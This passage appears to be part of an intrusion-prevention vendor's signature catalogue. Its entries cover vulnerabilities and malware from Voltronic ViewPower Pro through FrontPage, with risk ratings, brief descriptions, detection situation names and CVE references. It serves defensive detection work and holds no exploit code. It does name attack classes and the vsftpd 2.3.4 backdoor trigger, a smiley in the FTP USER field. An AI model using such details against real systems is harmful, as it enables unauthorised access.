Description: Improper input validation in the selectDeviceListBy method causes an SQL injection vulnerability in Voltronic Power ViewPower Pro. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Voltronic-Power-Viewpower-Pro-Selectdevicelistby-SQL-Injection
Generic_CS-Voltronic-Power-Viewpower-Pro-Selectdevicelistby-SQL-Injection
References:
CVE-2023-51595
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51595
Back to top

Voltronic-Power-Viewpower-Pro-Selecteventconfig-SQL-Injection

About this vulnerability: A vulnerability in Voltronic Power ViewPower Pro
Risk: Moderate
First detected in: sgpkg-ips-1694-5242
Last changed: sgpkg-ips-1694-5242
Platform: Generic
Software: Voltronic Power ViewPower Pro
Type: Input Validation
Description: Improper input validation in the selectEventConfig method causes an SQL injection vulnerability in Voltronic Power ViewPower Pro. A successful exploitation allows an attacker to execute arbitrary SQL on the target system and possibly execute arbitrary code with the privileges of the target service.
Situation: Generic_CS-Voltronic-Power-Viewpower-Pro-Selecteventconfig-SQL-Injection
References:
CVE-2023-51586
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51586
Back to top

Voltronic-Power-Viewpower-Pro-UpdateManagerPassword-Authentication-Bypass

About this vulnerability: An attempt to exploit a vulnerability in Voltronic ViewPower Pro detected
Risk: High
First detected in: sgpkg-ips-1681-5242
Last changed: sgpkg-ips-1681-5242
Platform: Windows; Linux; Mac OS
Software: Voltronic Power ViewPower Pro
Type: Insecure Configuration
Description: A vulnerability in Voltronic ViewPower Pro, versions Pro V2.0-20363 and V.HTML 1.04-21344, which allows remote attackers to change passwords without authentication by sending RMI requests to the target server, due to the method updateManagerPassword being exposed in it's RMI service.
Situation: Generic_CS-Voltronic-Power-Viewpower-Pro-UpdateManagerPassword-Authentication-Bypass
References:
CVE-2023-51573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51573
Back to top

Voltronic-Power-Viewpower-Pro-Uploadaction-Unrestricted-File-Upload

About this vulnerability: A vulnerability in Voltronic Power ViewPower Pro
Risk: High
First detected in: sgpkg-ips-1678-5242
Last changed: sgpkg-ips-1678-5242
Platform: Generic
Software: Voltronic Power ViewPower Pro
Type: Input Validation
Description: An unrestricted file upload vulnerability has been reported in Voltronic ViewPower Pro. The vulnerability is due to improper validation of file types uploaded to the target server. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code execution under the security context of LOCAL SERVICE.
Situation: HTTP_CS-Voltronic-Power-Viewpower-Pro-Uploadaction-Unrestricted-File-Upload
HTTP_CS-Voltronic-Power-Viewpower-Pro-Uploadaction-Unrestricted-File-Upload-2
References:
CVE-2023-51590
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51590
Back to top

VSFTPD-Backdoor-Command-Execution

About this vulnerability: A VSFTPD Backdoor Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VSFTPD
Type: Backdoor
Description: A backdoor was introduced into the vsftpd-2.3.4.tar.gz download archive between June 30th 2011 and July 1st 2011, which gives remote users the ability to login by using a :) in the USER parameter. More information can be found here http://scarybeastsecurity.blogspot.fi/2011/07/alert-vsftpd-download-backdoored.html.
Situation: FTP_CS-VSFTPD-Backdoor-Command-Execution
References:
OSVDB-73573
http://www.osvdb.org/73573
Back to top

Vtiger-CRM-Authenticated-Remote-Code-Execution

About this vulnerability: A vulnerability in vTiger CRM 5.3.0/5.4.0
Risk: Moderate
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: vTiger CRM
Type: PHP Injection
Description: An authenticated user can upload malicious php code to vTiger CRM and execute it remotely.
Situation: HTTP_CS-Vtiger-CRM-Authenticated-Remote-Code-Execution
References:
CVE-2013-3591
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3591
Back to top

Vtiger-CRM-PHP-Code-Injection

About this vulnerability: A Vtiger CRM PHP Code Injection vulnerability.
Risk: High
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1720-5242
Platform: Generic
Software: vTiger CRM
Type: PHP Injection
Description: A vulnerability in vTiger CRM, versions 5.4.0 and before, which allows remote attackers to inject and execute arbitrary PHP code.
Situation: File-TextId_Vtiger-CRM-PHP-Code-Injection
References:
CVE-2013-3214
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3214
BID-61558
http://www.securityfocus.com/bid/61558
OSVDB-95902
http://www.osvdb.org/95902
Back to top

Vtiger-Install-Module-Remote-Command-Execution

About this vulnerability: A Vtiger Install Module Remote Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-697-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: vTiger CRM
Type: Insecure Configuration
Description: A remote command execution vulnerability in vTiger, version 6.0 before security patch 2, which allows remote attackers to re-install the application with a request that sets the X-Requested-With HTTP header.
Situation: HTTP_CS-Vtiger-Install-Module-Remote-Command-Execution
References:
CVE-2014-2268
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2268
BID-66757
http://www.securityfocus.com/bid/66757
Back to top

Vundo

About this vulnerability: Vundo
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Vundo is a Bot that can download additional malicious content on the infected machine.
Situation: HTTP_CSU-Vundo-Traffic
HTTP_SLS-Vundo-Traffic
Back to top

VxWorks-Memory-Corruption-Vulnerability-CVE-2019-12255

About this vulnerability: A vulnerability in VxWorks
Risk: High
First detected in: sgpkg-ips-1181-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VxWorks
Type: Buffer Overflow
Description: There exists several memory corruption vulnerabilities in the VxWorks TCP/IP stack related to the handling of the Urgent Pointer field. The Forcepoint NGFW automatically strips out the Urgent flag from all TCP segments if present, in addition to any data in the Urgent Pointer field. This means that the Forcepoint NGFW automatically protects against these vulnerabilities.
References:
CVE-2019-12255
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12255
Back to top

VxWorks-Memory-Corruption-Vulnerability-CVE-2019-12260

About this vulnerability: A vulnerability in VxWorks
Risk: High
First detected in: sgpkg-ips-1181-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VxWorks
Type: Buffer Overflow
Description: There exists several memory corruption vulnerabilities in the VxWorks TCP/IP stack related to the handling of the Urgent Pointer field. The Forcepoint NGFW automatically strips out the Urgent flag from all TCP segments if present, in addition to any data in the Urgent Pointer field. This means that the Forcepoint NGFW automatically protects against these vulnerabilities.
References:
CVE-2019-12260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12260
Back to top

VxWorks-Memory-Corruption-Vulnerability-CVE-2019-12261

About this vulnerability: A vulnerability in VxWorks
Risk: High
First detected in: sgpkg-ips-1181-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VxWorks
Type: Buffer Overflow
Description: There exists several memory corruption vulnerabilities in the VxWorks TCP/IP stack related to the handling of the Urgent Pointer field. The Forcepoint NGFW automatically strips out the Urgent flag from all TCP segments if present, in addition to any data in the Urgent Pointer field. This means that the Forcepoint NGFW automatically protects against these vulnerabilities.
References:
CVE-2019-12261
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12261
Back to top

VxWorks-Memory-Corruption-Vulnerability-CVE-2019-12263

About this vulnerability: A vulnerability in VxWorks
Risk: High
First detected in: sgpkg-ips-1181-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VxWorks
Type: Buffer Overflow
Description: There exists several memory corruption vulnerabilities in the VxWorks TCP/IP stack related to the handling of the Urgent Pointer field. The Forcepoint NGFW automatically strips out the Urgent flag from all TCP segments if present, in addition to any data in the Urgent Pointer field. This means that the Forcepoint NGFW automatically protects against these vulnerabilities.
References:
CVE-2019-12263
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12263
Back to top

VxWorks-Stack-Overflow-Vulnerability-CVE-2019-12256

About this vulnerability: A vulnerability in VxWorks
Risk: High
First detected in: sgpkg-ips-1181-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VxWorks
Type: Buffer Overflow
Description: There exists a stack overflow vulnerability in the Wind River VxWorks. The vulnerability is in the processing of Loose Source Route and Strict Source Route options. When packets containing these options are seen, the NGFW will produce the situations "IP Option Loose Source Route" and "IP Option Strict Source Route". To prevent the usage of these options, these situations can be set to terminate in the inspection policy.
Situation: IP Option Loose Source Route
IP Option Strict Source Route
References:
CVE-2019-12256
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12256
Back to top

W2B-Online-Banking-SQL-Injection-Vulnerability

About this vulnerability: SQL injection vulnerability in W2B Banking
Risk: High
First detected in: sgpkg-ips-278-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: W2B Online Banking
Type: SQL Injection
Description: There is an SQL injection vulnerability in W2B Online Banking. The software fails to sanitize the user-supplied data which allows injection of SQL commands.
Situation: HTTP_CRL-Possible-W2B-Banking-SQL-Injection
References:
CVE-2007-3175
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3175
OSVDB-37466
http://www.osvdb.org/37466
OSVDB-37467
http://www.osvdb.org/37467
Back to top

W32-Jorik-Sefnit

About this vulnerability: W32.Jorik/Sefnit
Risk: Moderate
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Backdoor
Description: Traffic possibly related to W32.Jorik/Sefnit
Situation: HTTP_CSU-W32-Jorik-Sefnit-2
HTTP_CSU-W32-Jorik-Sefnit
Back to top

W32/Brepibot.gen-Malware

About this vulnerability: W32/Brepibot.gen malware
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: W32/Brepibot.gen is a Windows malware that can be remotely controlled via IRC.
Situation: Generic_CS-W32/Brepibot.gen-Activity
Back to top

W32/Gaobot.worm.gen-Worm-IRC-Activity

About this vulnerability: Botnet IRC Activity
Risk: High
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: W32/Gaobot.worm is a network worm. It also has a botnet capablities. There other botnet-enabled worms that may generate similar IRC traffic, such as W32/Sdbot.worm or UrxBot.
Situation: Generic_SS-W32/Gaobot.worm.gen-Worm-IRC-Activity
Back to top

W32/Gaobot.worm.gen.by-Malware

About this vulnerability: W32/gaobot.worm.gen.by malware
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: W32/Gaobot.worm is a Windows malware that can be remote controlled over IRC.
Situation: Generic_CS-W32/Gaobot.worm.gen.by-Activity
Back to top

W32/Gaobot.worm.gen.d-Malware

About this vulnerability: W32/Gaobot.worm.gen.d malware
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: W32/Gaobot.worm.gen.d is a Windows malware that can be remotely controlled via IRC.
Situation: Generic_CS-W32/Gaobot.worm.gen.d-Activity
Back to top

W32/Gaobot.worm.gen.e-Malware

About this vulnerability: W32/gaobot.worm.gen.e malware
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: W32/Gaobot.worm.gen.e is a Windows malware that can be controlled over IRC.
Situation: Generic_CS-W32/Gaobot.worm.gen.e-Activity
Back to top

W32/Gaobot.worm.gen.j-Malware

About this vulnerability: w32/gaobot.worm.gen.j malware
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: W32/Gaobot.worm.gen.j is a Windows malware that can be remotely controlled over IRC.
Situation: Generic_CS-W32/Gaobot.worm.gen.j-Activity
Back to top

W32/Ircbot.gen-Malware

About this vulnerability: W32/Ircbot.gen malware
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: W32/Ircbot.gen is a Windows malware that can be controlled over IRC.
Situation: Generic_CS-W32/Ircbot.gen-Connect
Back to top

W32/Ircbot.worm!ms05-039-Malware

About this vulnerability: W32/Ircbot.worm!ms05-039 malware
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: W32/Ircbot.worm!ms05-039 is a Windows malware that can be remote controlled via IRC.
Situation: Generic_CS-W32/Ircbot.worm!ms05-039-Activity
Back to top

W32/Ircbot.worm.gen-Malware

About this vulnerability: W32/ircbot.worm.gen malware
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: W32/Ircbot.worm is a Windows malware that can be remote controlled via IRC.
Situation: Generic_CS-W32/Ircbot.worm.gen-Activity
Back to top

W32/Mydoom.bg@mm-Malware

About this vulnerability: W32/Mydoom.bg@mm malware
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: W32/Mydoom.bg@mm is a mass-mailing Windows malware that can be remote controlled over IRC.
Situation: Generic_CS-W32/Mydoom.bg@mm-Activity
Back to top

W32/Mydoom@MM

About this vulnerability: W32/Mydoom@MM
Risk: Low
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Mydoom@MM is a mass-mailing and peer-to-peer file-sharing worm that can cause Denial of Service.
Back to top

W32/Mytob.gen@mm-Malware

About this vulnerability: W32/Mytob.gen@mm malware
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: W32/Mytop.gen@mm is a mass-mailing Windows malware that can be controlled over IRC.
Situation: Generic_CS-W32/Mytob.gen@mm-Activity
Back to top

W32/MyWife.d@MM!M24-Malware

About this vulnerability: W32/MyWife.d@MM!M24 malware
Risk: High
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: W32/MyWife.d@MM!M24 is a worm that spreads through e-mail.
Situation: HTTP_CSU-W32/MyWife.d@MM!M24-Activity
Back to top

W32/Nuwar@mm-Malware

About this vulnerability: W32/Nuwar@MM Encrypted Traffic
Risk: High
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: W32/Nuwar@MM is a mass-mailing Windows worm. It also has a botnet capablity.
Situation: Generic_CS-W32/Nuwar@mm-Encrypted-Traffic
Generic_SS-W32/Nuwar@mm-Encrypted-Traffic
Generic_UDP-W32/Nuwar@mm-Encrypted-Traffic
Datalength-UDP_W32/Nuwar@mm-Encrypted-Traffic
Datalength-TCP_W32/Nuwar@mm-Encrypted-Traffic
Back to top

W32/Oscarbot-Malware

About this vulnerability: W32/Oscarbot malware
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: W32/Oscarbot is a Windows malware that can be remotely controlled over IRC.
Situation: Generic_CS-W32/Oscarbot-Activity
Back to top

W32/Poebot.dam-Malware

About this vulnerability: W32/Poebot.dam malware
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: W32/Powbot.dam is a Windows malware that can be controlled over IRC.
Situation: Generic_CS-W32/Poebot.dam-Activity
Back to top

W32/Poebot.gen-Malware

About this vulnerability: W32/Poebot.gen malware
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: W32/Poebot.gen is a Windows malware that can be remotely controlled over IRC.
Situation: Generic_CS-W32/Poebot.gen-Activity
Back to top

W32/Polybot.dr-Activity

About this vulnerability: w32/Polybot.dr activity
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: W32/Polybot.dr is a Windows malware that can be controlled over IRC.
Situation: Generic_CS-W32/Polybot.dr-Activity
Back to top

W32/Polybot.gen!irc-Malware

About this vulnerability: W32/Polybot.gen!irc malware
Risk: High
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: W32/Polybot.gen!irc is a bot that can be controlled via IRC.
Situation: Generic_CS-W32/Polybot.gen!irc-Activity
Back to top

W32/Polybot@mm-Malware

About this vulnerability: W32/Polybot@mm malware
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: W32/Polybot@mm is a mass-mailing Windows worm that can be controlled over IRC.
Situation: Generic_CS-W32/Polybot@mm-Activity
HTTP_CS-W32/Polybot@mm-Activity
Back to top

W32/Sdbot.g.gen-Malware

About this vulnerability: W32/Sdbot.g.gen malware
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: W32/Sdbot.g.gen is a Windows malware that can be controlled over IRC.
Situation: Generic_CS-W32/Sdbot.g.gen-Activity
Back to top

W32/Sdbot.worm.gen-Malware

About this vulnerability: W32/Sdbot.worm.gen malware
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: W32/Sdbot.worm.gen is a Windows worm that can be remotely controlled over IRC.
Situation: Generic_CS-W32/Sdbot.worm.gen-Activity-2
Generic_CS-W32/Sdbot.worm.gen-Activity
Generic_SS-W32/Sdbot.worm.gen-Activity
HTTP_CS-W32/Sdbot.worm.gen-Activity
Back to top

W32/Sdbot.worm.gen.bj-Malware

About this vulnerability: W32/Sdbot.worm.gen.bj malware
Risk: High
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: W32/Sdbot.worm.gen.bj is a Sdbot variant that can be controlled over IRC.
Situation: Generic_CS-W32/Sdbot.worm.gen.bj-Activity
Generic_CS-W32/Spybot.worm.gen.bj-Connect
Generic_SS-W32/Sdbot.worm.gen.bj-Activity
Back to top

W32/Sdbot.worm.gen.by-Malware

About this vulnerability: W32/Sdbot.worm.gen.by malware
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: W32/Sdbot.worm is an IRC-controlled botnet.
Situation: Generic_CS-W32/Sdbot.worm.gen.by-Activity
Generic_SS-W32/Sdbot.worm.gen.by-Activity
Back to top

W32/Spybot.worm.gen.e-Malware

About this vulnerability: W32/Spybot.worm.gen.e malware
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: W32/Spybot.worm.gen.e is a Windows worm that can be remotely controlled over IRC.
Situation: Generic_CS-W32/Spybot.worm.gen.e-Activity
Back to top

W32/Spybot.worm.gen.f-Malware

About this vulnerability: W32/Spybot.worm.gen.f malware
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: W32/Spybot.wom.gen.f is a Windows malware that can be remotely controlled over IRC.
Situation: Generic_CS-W32/Spybot.worm.gen.f-Activity
Back to top

W32/Spybot.worm.gen.o-Malware

About this vulnerability: W32/spybot.worm.gen.o malware
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: W32/Spybot.worm.gen.o is a Windows malware that can be controlled over IRC.
Situation: Generic_CS-W32/Spybot.worm.gen.o-Activity
Back to top

W3C-Amaya-Web-Browser-Stack-Based-Buffer-Overflow

About this vulnerability: A stack based buffer overflow vulnerability in W3C Amaya Web Browser.
Risk: High
First detected in: sgpkg-ips-665-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: W3C Amaya
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in W3C Amaya Web Browser 10.0 and 11.0 which allows remote attackers to execute arbitrary code via a long type parameter in an input tag.
Situation: File-Text_W3C-Amaya-Web-Browser-Stack-Based-Buffer-Overflow
References:
CVE-2009-0323
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0323
BID-33047
http://www.securityfocus.com/bid/33047
OSVDB-55721
http://www.osvdb.org/55721
Back to top

Waledac-Bot

About this vulnerability: Waledac Bot
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Waledac is a Botnet mostly used for sending e-mail spam.
Situation: HTTP_CSU-Waledac-Bot-Traffic
HTTP_CSH-Waledac-Bot-Traffic
Back to top

Waledac-Spambot

About this vulnerability: Waledac spambot is a template-based spamming engine
Risk: High
First detected in: sgpkg-ips-269-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Waledac spambot
Type: Backdoor
Description: Waledac spambot is a template-based spamming engine. The Waledac botnet is acknowledged to be the successor to the Storm botnet.
Situation: HTTP_CRL-Waledac-Spambot
Back to top

WAMP-Webmail-No-Url-File-Inclusion

About this vulnerability: File inclusion vulnerability in WAMP Webmail
Risk: High
First detected in: sgpkg-ips-199-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WAMP Webmail
Type: Input Validation
Description: There is a file inclusion vulnerability in the WAMP Webmail software written in the PHP scripting language. The software does not validate parameters for the yesno.phtml script correctly, allowing inclusion and execution of arbitrary PHP code in the context of the web server process.
Situation: HTTP_CRL-WAMP-Webmail-No-Url-File-Inclusion
References:
CVE-2006-5147
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5147
BID-20289
http://www.securityfocus.com/bid/20289
OSVDB-33916
http://www.osvdb.org/33916
Back to top

Wannacry-Ransomware

About this vulnerability: A transfer of WannaCry ransomware detected
Risk: High
First detected in: sgpkg-ips-1860-5242
Last changed: sgpkg-ips-1860-5242
Platform: Generic
Software: WannaCry
Type: Backdoor
Description: WannaCry ransomware executable.
Situation: File-Exe_Wannacry-Ransomware
Back to top

War-Ftpd-User-Pass-BOF

About this vulnerability: Buffer overflow in War FTPD
Risk: Moderate
First detected in: sgpkg-ips-13-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: War FTP Daemon
Type: Buffer Overflow
Description: WarFTPD is vulnerable to a buffer overflow in the USER and PASS command handling. A remote attacker can overflow a buffer and execute arbitrary commands on the server.
Situation: FTP_CS-War-Ftpd-User-Pass-BOF
FTP_CS-War-Ftpd-User-Pass-BOF-2
References:
CVE-1999-0256
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0256
BID-10078
http://www.securityfocus.com/bid/10078
OSVDB-875
http://www.osvdb.org/875
Back to top

Watchguard-Pre-Auth-RCE-CVE-2022-26318

About this vulnerability: A vulnerability in Watchguard
Risk: Moderate
First detected in: sgpkg-ips-1502-5242
Last changed: sgpkg-ips-1502-5242
Platform: Generic
Software: Watchguard
Type: Input Validation
Description: Improper input validation causes a remote code execution vulnerability in Watchguard.
Situation: HTTP_CRL-Watchguard-Pre-Auth-RCE-CVE-2022-26318
References:
CVE-2022-26318
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26318
Back to top

Wavelink-Emulation-License-Server-HTTP-Header-Processing-Buffer-Overflow

About this vulnerability: A vulnerability in Wavelink Emulation License Server
Risk: High
First detected in: sgpkg-ips-665-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wavelink Emulation License Server
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Wavelink Emulation License Server. The vulnerability is due to a boundary error when parsing HTTP headers. By sending crafted requests to a vulnerable server, a remote unauthenticated attacker can possibly exploit this vulnerability to execute arbitrary code in the security context of the System user.
Situation: HTTP_CRL-Wavelink-Emulation-License-Server-HTTP-Header-Processing-Buffer-Overflow
HTTP_CSH-Wavelink-Emulation-License-Server-HTTP-Header-Processing-Buffer-Overflow
References:
CVE-2015-4059
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4059
Back to top

Wavlink-WN535K2-WN535K3-OS-Command-Injection

About this vulnerability: A vulnerability in WAVLINK
Risk: High
First detected in: sgpkg-ips-1529-5242
Last changed: sgpkg-ips-1529-5242
Platform: Generic
Software: WAVLINK
Type: Input Validation
Description: A command injection vulnerability has been reported in the WAVLINK WN535K2 and WN535K3 wireless router devices. An unauthenticated remote attacker can use this vulnerability to execute arbitrary OS commands.
Situation: HTTP_CSU-Wavlink-WN535K2-WN535K3-OS-Command-Injection
References:
CVE-2022-2488
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2488
Back to top

Wayboard-Cgi-Directory-Traversal

About this vulnerability: Way-board CGI directory traversal
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Linux
Software: Way-Board
Type: Directory Traversal
Description: The Way-board CGI script can be exploited using a directory traversal attack. The attacker may read any known file on the system with the web server privileges.
Situation: HTTP_CSU-Wayboard-Cgi-Directory-Traversal
References:
CVE-2001-0214
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0214
BID-2370
http://www.securityfocus.com/bid/2370
Back to top

Wazuh-As_Wazuh_Object-Insecure-Deserialization-CVE-2025-24016

About this vulnerability: A vulnerability in Wazuh
Risk: Moderate
First detected in: sgpkg-ips-1852-5242
Last changed: sgpkg-ips-1852-5242
Platform: Generic
Software: Wazuh
Type: Input Validation
Description: Improper input validation in the as_wazuh_object function causes an insecure object deserialization vulnerability in Wazuh. A successful exploitation allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Wazuh-As_Wazuh_Object-Insecure-Deserialization-CVE-2025-24016
References:
CVE-2025-24016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24016
Back to top

Wazuh-Wazuh-Host-Deny-Command-Injection

About this vulnerability: A vulnerability in Wazuh Wazuh
Risk: Moderate
First detected in: sgpkg-ips-1729-5242
Last changed: sgpkg-ips-1729-5242
Platform: Generic
Software: Wazuh
Type: Input Validation
Description: A command injection vulnerability has been reported in Wazuh. The vulnerability is due to improper input validation when running the host-deny active response command. A remote attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploitation could result in command execution on the server or agent hosts.
Situation: HTTP_CRL-Wazuh-Wazuh-Host-Deny-Command-Injection
References:
CVE-2023-50260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50260
Back to top

WD-My-Cloud-NAS-Command-Injection-Vulnerability

About this vulnerability: A vulnerability in WD My Cloud NAS
Risk: Moderate
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WD My Cloud NAS
Type: Input Validation
Description: There exists a command injection vulnerability in WD My Cloud NAS. A successful exploit can lead to remote code execution.
Situation: HTTP_CRL-WD-My-Cloud-NAS-Command-Injection-Vulnerability
Back to top

Weak-Diffie-Hellman-Parameters

About this vulnerability: Weak Diffie-Hellman parameters
Risk: High
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Configuration Error
Description: TLS connections with weak Diffie-Hellman parameters (too short prime) can allow passive eavesdropping. CVE-2015-4000 is also known as the "Logjam" issue.
Situation: TLS_Export-Ciphersuite
TLS_Export-Ciphersuite
HTTPS_SS-Short-Diffie-Hellman-Prime
HTTPS_SS-Very-Short-Diffie-Hellman-Prime
References:
CVE-2015-4000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
BID-74733
http://www.securityfocus.com/bid/74733
Back to top

Web-Content-Scanner-Activity

About this vulnerability: Web-content scanner activity detected
Risk: High
First detected in: sgpkg-ips-1274-5242
Last changed: sgpkg-ips-1759-5242
Platform: Generic
Software: <os>
Type: Vulnerability Scanner
Description: One of the primary steps in attacking a web application is enumerating hidden URLs, directories and files within the application. This detects the activities of web scanners, such as gobuster, ffuf, and feroxbuster.
Situation: HTTP_CRH-Web-Content-Scanner-Activity
Back to top

Web-Dorado-Ecommerce-WD-SQL-Injection

About this vulnerability: A Web-Dorado ECommerce WD SQL Injection vulnerability.
Risk: High
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Web-Dorado ECommerce WD
Type: SQL Injection
Description: A vulnerability in Web-Dorado ECommerce WD, version 1.2.5, which allows remote attackers to execute arbitrary SQL commands via the search_category_id, sort_order, and filter_manufacturer_ids in a displayproducts action to index.php.
Situation: HTTP_CRL-Web-Dorado-Ecommerce-WD-SQL-Injection
References:
CVE-2015-2562
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2562
Back to top

Web-FrontPage-Rad-Reg-DLL-BOF

About this vulnerability: FrontPage Server Extension RAD sub-component buffer overflow
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows NT; Windows 2000
Software: FrontPage Server Extensions; IIS 4.0; IIS 5.0
Type: Buffer Overflow
